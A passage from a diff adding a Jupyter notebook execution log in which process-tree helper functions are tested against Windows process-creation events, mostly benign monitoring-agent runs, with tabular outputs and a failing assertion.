<td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:32:56.247</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x53c</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/76</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xef42019-02-09 22:32:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:32:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xef4</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/78</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xd742019-02-09 23:22:56.257000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 23:22:56.257</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xd74</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/107</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x6f82019-02-09 23:32:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 23:32:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x6f8</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/120</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x1fc02019-02-10 00:02:56.257000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:02:56.257</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x1fc0</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/127</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x10bc2019-02-10 00:12:56.253000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:12:56.253</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x10bc</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/129</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xb482019-02-10 00:32:56.270000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:32:56.270</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xb48</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/139</td>\n      <td>1004</td>\n    </tr>\n  </tbody>\n</table>\n<p>12 rows × 35 columns</p>\n</div>",
+        "text/plain": "                                                                                TenantId  \\\nproc_key                                                                                   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n\n                                                                       Account  \\\nproc_key                                                                         \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \n\n                                                    EventID  \\\nproc_key                                                      \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \n\n                                                             TimeGenerated  \\\nproc_key                                                                     \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 20:32:56.260   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 20:52:56.260   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:02:56.257   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:32:56.270   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:02:56.263   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.247   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.260   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:22:56.257   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:32:56.260   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:02:56.257   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:12:56.253   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:32:56.270   \n\n                                                           Computer  \\\nproc_key                                                              \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \n\n                                                   SubjectUserSid  \\\nproc_key                                                            \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \n\n                                                     SubjectUserName  \\\nproc_key                                                               \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \n\n                                                   SubjectDomainName  \\\nproc_key                                                               \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \n\n                                                   SubjectLogonId  \\\nproc_key                                                            \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \n\n                                                   NewProcessId  ...  \\\nproc_key                                                         ...   \nc:\\program files\\microsoft monitoring agent\\age...       0x15c8  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xcd8  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0x8dc  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xbd0  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xe34  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0x53c  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xef4  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xd74  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0x6f8  ...   \nc:\\program files\\microsoft monitoring agent\\age...       0x1fc0  ...   \nc:\\program files\\microsoft monitoring agent\\age...       0x10bc  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xb48  ...   \n\n                                                   source_index_par  \\\nproc_key                                                              \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \n\n                                                   ProcessId_par  \\\nproc_key                                                           \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \n\n                                                   NewProcessName_par  \\\nproc_key                                                                \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \n\n                                                   TimeGenerated_orig_par  \\\nproc_key                                                                    \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \n\n                                                                                           parent_key  \\\nproc_key                                                                                                \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \n\n                                                   IsRoot IsLeaf IsBranch  \\\nproc_key                                                                    \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \n\n                                                        path parent_index  \nproc_key                                                                   \nc:\\program files\\microsoft monitoring agent\\age...    1004/5         1004  \nc:\\program files\\microsoft monitoring agent\\age...    1004/8         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/10         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/15         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/67         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/76         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/78         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/107         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/120         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/127         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/129         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/139         1004  \n\n[12 rows x 35 columns]"
+       },
+       "execution_count": 51,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c",
+     "text": "ptutil.get_siblings(p_tree, children.iloc[0])"
+    },
+    "executionTime": "2019-12-13T21:02:32.577Z"
+   },
+   {
+    "cell": {
+     "executionCount": 52,
+     "executionEventId": "28c27720-6005-4910-b92e-db32aedb61e7",
+     "hasError": false,
+     "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "13"
+       },
+       "execution_count": 52,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c",
+     "text": "ptutil.get_siblings(p_tree, children.iloc[0])\nlen(children)"
+    },
+    "executionTime": "2019-12-13T21:02:47.381Z"
+   },
+   {
+    "cell": {
+     "executionCount": 53,
+     "executionEventId": "d77b1d3c-b7b3-463f-9791-ae8869983094",
+     "hasError": false,
+     "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "False"
+       },
+       "execution_count": 53,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c",
+     "text": "\nlen(children) == len(ptutil.get_siblings(p_tree, children.iloc[0], include_source=True))"
+    },
+    "executionTime": "2019-12-13T21:03:19.834Z"
+   },
+   {
+    "cell": {
+     "executionCount": 54,
+     "executionEventId": "c84291cf-0a56-48d6-806d-9ae0619bd7e6",
+     "hasError": false,
+     "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "12"
+       },
+       "execution_count": 54,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332",
+     "text": "len(ptutil.get_siblings(p_tree, children.iloc[0], include_source=True))"
+    },
+    "executionTime": "2019-12-13T21:03:35.556Z"
+   },
+   {
+    "cell": {
+     "executionCount": 55,
+     "executionEventId": "d5928f27-f0a7-4965-a8b7-787458dbfa69",
+     "hasError": false,
+     "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "True"
+       },
+       "execution_count": 55,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c",
+     "text": "children2 = ptutil.get_children(p_tree, t_root, include_source=False)\nlen(children2) == len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=True))"
+    },
+    "executionTime": "2019-12-13T21:04:29.396Z"
+   },
+   {
+    "cell": {
+     "executionCount": 56,
+     "executionEventId": "44bf1d02-7734-47a3-9e3a-e93aac4e1151",
+     "hasError": true,
+     "id": "5610ff3a-83b0-4253-92bb-feba160df533",
+     "outputs": [
+      {
+       "ename": "AssertionError",
+       "evalue": "",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mAssertionError\u001b[0m                            Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-56-e8d96acdb985>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[0;32m     16\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mbuild_process_key\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mbottom_desc\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mname\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m     17\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m---> 18\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_root\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mall\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m     19\u001b[0m \u001b[1;32massert\u001b[0m \u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_root\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mdropna\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mdropna\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mall\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m     20\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mAssertionError\u001b[0m: "
+       ]
+      }
+     ],
+     "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8",
+     "text": "assert len(ptutil.get_roots(p_tree)) == 10\nt_root = ptutil.get_roots(p_tree).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree, t_root)\nassert len(s_tree) == 25\nchildren = ptutil.get_children(p_tree, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree, bottom_desc) == t_root).all()\nassert (ptutil.get_root(p_tree, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=True))\nassert len(children2) == len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=True)) + 1\nassert ptutil.get_summary_info(p_tree) == {\n    'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree) == ptutil.WIN_EVENT_SCH"
+    },
+    "executionTime": "2019-12-13T21:05:48.872Z"
+   },
+   {
+    "cell": {
+     "executionCount": 57,
+     "executionEventId": "6eb3074b-ea9e-44a4-bd0e-73c7242e064f",
+     "hasError": true,
+     "id": "5610ff3a-83b0-4253-92bb-feba160df533",
+     "outputs": [
+      {
+       "ename": "AssertionError",
+       "evalue": "",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mAssertionError\u001b[0m                            Traceback (most recent call last)",
